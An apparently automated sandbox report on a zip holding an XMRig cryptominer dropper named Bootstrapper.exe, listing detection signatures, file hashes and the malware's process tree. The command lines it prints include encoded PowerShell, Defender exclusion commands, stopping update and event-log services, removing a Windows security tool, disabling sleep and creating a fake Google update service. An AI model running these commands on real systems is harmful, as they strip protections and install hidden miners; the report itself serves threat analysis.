Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-12-2024 13:59

General

  • Target

    19-12-2024_UqVE2XPvW38Pgkj.zip

  • Size

    4.3MB

  • MD5

    cf356b163f946dc2f16d95febf45a583

  • SHA1

    e7c8e964c23f86765d729b82d3140604bb00cb7c

  • SHA256

    50d3bf20e1534889385de4b8d780a750c9d37a75c941ffae6dd961caef2eb325

  • SHA512

    baa6367011ebda751fe7ef40a49f99e96c5daf19e068b02b2cdf564477f17a792a9dc0887b9723208d0c49d55a7e1c501723643d12fee8c8dcd0d1406e65be2d

  • SSDEEP

    98304:YIv1mD5TqdFfK4iBOqWh3tWyfzbgwgGP7OZlGWwCR6t+uWiPBt1KP:YIdmFkF7iMtWKzkwgh1wc6t+cBS

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 50 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\19-12-2024_UqVE2XPvW38Pgkj.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4256
  • C:\Users\Admin\Desktop\Bootstrapper.exe
    "C:\Users\Admin\Desktop\Bootstrapper.exe"
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4492
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAagBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAdABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAG8AcgA6ACAAQwBvAHUAbABkACAAbgBvAHQAIABzAHQAYQByAHQAOgAgAC4ATgBFAFQAIABGAHIAYQBtAGUAdwBvAHIAawAgADQALgA4AC4AMQAgAG4AbwB0ACAAaQBuAHMAdABhAGwAbABlAGQALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbQBxAGcAIwA+AA=="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:856
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAcgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAbQBpACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3244
    • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      PID:1840
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1160
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4668
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
            PID:4080
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1764
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1044
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          3⤵
          • Launches sc.exe
          PID:2292
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          3⤵
          • Launches sc.exe
          PID:4516
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          3⤵
          • Launches sc.exe
          PID:5072
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          3⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:1416
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          3⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:3212
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          3⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:3388
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          3⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:4940
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          3⤵
          • Launches sc.exe
          PID:4664
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          3⤵
          • Launches sc.exe
          PID:1388
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop eventlog
          3⤵
          • Launches sc.exe
          PID:1512
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          3⤵
          • Launches sc.exe
          PID:4368
    • C:\ProgramData\Google\Chrome\updater.exe
      C:\ProgramData\Google\Chrome\updater.exe
      1⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:480
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4832
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4700
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          3⤵
            PID:764
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          2⤵
          • Launches sc.exe
          PID:4716
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          2⤵
          • Launches sc.exe
          PID:2140
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          2⤵
          • Launches sc.exe
          PID:4404
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          2⤵
          • Launches sc.exe
          PID:2032
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          2⤵
          • Launches sc.exe
          PID:4124
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:2936
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:1988
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:1572
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:2604
        • C:\Windows\system32\conhost.exe
          C:\Windows\system32\conhost.exe
          2⤵
            PID:2316
          • C:\Windows\explorer.exe
            explorer.exe
            2⤵
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4444

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d0c46cad6c0778401e21910bd6b56b70

          SHA1

          7be418951ea96326aca445b8dfe449b2bfa0dca6

          SHA256

          9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

          SHA512

          057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          17KB

          MD5

          e909aedee6bd11de78cc1924c9fcbf71

          SHA1

          fa4e15ef565b3df384fedf0254cfcc77864baecf

          SHA256

          890a31e08e9b43ae89370731a70929b1c6ab0b9d5de61b890b9cb1c5846e1543

          SHA512

          4d1480160d0689b2fb9f3aeb614246f118dc815c14e5e648d940ef3ad5eaaa281c82ed3f076b0dcec420f642bab225180600e47fd1d7d2000669a260e94a3e15

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          3f2c9fe09984b9f28107ef194367bda0

          SHA1

          b842d08ba21b4a7eee90672523397440c4e3c37d

          SHA256

          3614d5a083107096f48282fdda735cdc88ea363b2ae45ae88b43ec7b9fee87b0

          SHA512

          babb99c5e28e1b46e3abac2e16a2de1e9ba9e1a1836fecbf407b9140f01c942c6491d4f2b20ce533e36b41a1bb6140445c3b7999742e9e1691e610d68e5edbd5

        • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe

          Filesize

          5.1MB

          MD5

          33a6872a056879c6a977599778a1fb0f

          SHA1

          109285b385ce0c21ee8b9624b63104d27a51115e

          SHA256

          79e48350a0712336332571a280272957ffc446c520e70a6e8827169fc84933d4

          SHA512

          7052a4d7e047768d0eb91b316c191aba2eb6247a66c0f39f2fd7e062bbdd31c402734c80b81dc2b144c199ecde2efc25a5afdfce476923a026bf927dff0c0973

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5arzmsf.xk2.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\Desktop\Bootstrapper.exe

          Filesize

          5.1MB

          MD5

          d15c24a478c313ede9d4ad03a4164f8a

          SHA1

          aceaa3800a3c042243e39b1235b7c1eef338e90f

          SHA256

          87e35093021944aa354666c0f7b594f4414e2c29a2da69f62a427ed56f91d2b1

          SHA512

          2b373ab102ba01bbb119f2e08daac38cb3f90939be0474c6086eb2d6e64eead65b41b8a818f464248b67973539b5de879844fe4175268ae8db808230480fea40

        • C:\Windows\system32\drivers\etc\hosts

          Filesize

          3KB

          MD5

          00930b40cba79465b7a38ed0449d1449

          SHA1

          4b25a89ee28b20ba162f23772ddaf017669092a5

          SHA256

          eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

          SHA512

          cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

        • memory/856-51-0x0000000007AA0000-0x0000000007B32000-memory.dmp

          Filesize

          584KB

        • memory/856-12-0x00000000051F0000-0x0000000005226000-memory.dmp

          Filesize

          216KB

        • memory/856-34-0x0000000006690000-0x00000000066AE000-memory.dmp

          Filesize

          120KB

        • memory/856-35-0x00000000066C0000-0x000000000670C000-memory.dmp

          Filesize

          304KB

        • memory/856-36-0x0000000007CE0000-0x000000000835A000-memory.dmp

          Filesize

          6.5MB

        • memory/856-37-0x0000000006BE0000-0x0000000006BFA000-memory.dmp

          Filesize

          104KB

        • memory/856-15-0x00000000058A0000-0x0000000005906000-memory.dmp

          Filesize

          408KB

        • memory/856-25-0x00000000061A0000-0x00000000064F7000-memory.dmp

          Filesize

          3.3MB

        • memory/856-16-0x0000000005F70000-0x0000000005FD6000-memory.dmp

          Filesize

          408KB

        • memory/856-50-0x0000000008910000-0x0000000008EB6000-memory.dmp

          Filesize

          5.6MB

        • memory/856-14-0x0000000005700000-0x0000000005722000-memory.dmp

          Filesize

          136KB

        • memory/1160-69-0x000001ACFFAF0000-0x000001ACFFB12000-memory.dmp

          Filesize

          136KB

        • memory/2316-108-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2316-107-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2316-114-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2316-111-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2316-109-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2316-110-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/3244-48-0x0000000007620000-0x000000000763E000-memory.dmp

          Filesize

          120KB

        • memory/3244-58-0x0000000007D10000-0x0000000007D18000-memory.dmp

          Filesize

          32KB

        • memory/3244-57-0x0000000007D20000-0x0000000007D3A000-memory.dmp

          Filesize

          104KB

        • memory/3244-56-0x0000000007C30000-0x0000000007C45000-memory.dmp

          Filesize

          84KB

        • memory/3244-55-0x0000000007C20000-0x0000000007C2E000-memory.dmp

          Filesize

          56KB

        • memory/3244-13-0x00000000058C0000-0x0000000005EEA000-memory.dmp

          Filesize

          6.2MB

        • memory/3244-54-0x0000000007BE0000-0x0000000007BF1000-memory.dmp

          Filesize

          68KB

        • memory/3244-53-0x0000000007C60000-0x0000000007CF6000-memory.dmp

          Filesize

          600KB

        • memory/3244-52-0x0000000007A60000-0x0000000007A6A000-memory.dmp

          Filesize

          40KB

        • memory/3244-49-0x0000000007690000-0x0000000007734000-memory.dmp

          Filesize

          656KB

        • memory/3244-39-0x0000000070AC0000-0x0000000070B0C000-memory.dmp

          Filesize

          304KB

        • memory/3244-38-0x0000000007640000-0x0000000007674000-memory.dmp

          Filesize

          208KB

        • memory/4444-120-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-117-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-132-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-131-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-118-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-115-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-122-0x0000000001330000-0x0000000001350000-memory.dmp

          Filesize

          128KB

        • memory/4444-116-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-119-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-125-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-126-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-127-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-124-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-123-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4444-121-0x0000000140000000-0x0000000140848000-memory.dmp

          Filesize

          8.3MB

        • memory/4832-95-0x000001DA71930000-0x000001DA7193A000-memory.dmp

          Filesize

          40KB

        • memory/4832-101-0x000001DA71B70000-0x000001DA71B7A000-memory.dmp

          Filesize

          40KB

        • memory/4832-96-0x000001DA71B40000-0x000001DA71B5C000-memory.dmp

          Filesize

          112KB

        • memory/4832-97-0x000001DA71B20000-0x000001DA71B2A000-memory.dmp

          Filesize

          40KB

        • memory/4832-98-0x000001DA71B80000-0x000001DA71B9A000-memory.dmp

          Filesize

          104KB

        • memory/4832-94-0x000001DA71960000-0x000001DA71A13000-memory.dmp

          Filesize

          716KB

        • memory/4832-93-0x000001DA71940000-0x000001DA7195C000-memory.dmp

          Filesize

          112KB

        • memory/4832-99-0x000001DA71B30000-0x000001DA71B38000-memory.dmp

          Filesize

          32KB

        • memory/4832-100-0x000001DA71B60000-0x000001DA71B66000-memory.dmp

          Filesize

          24KB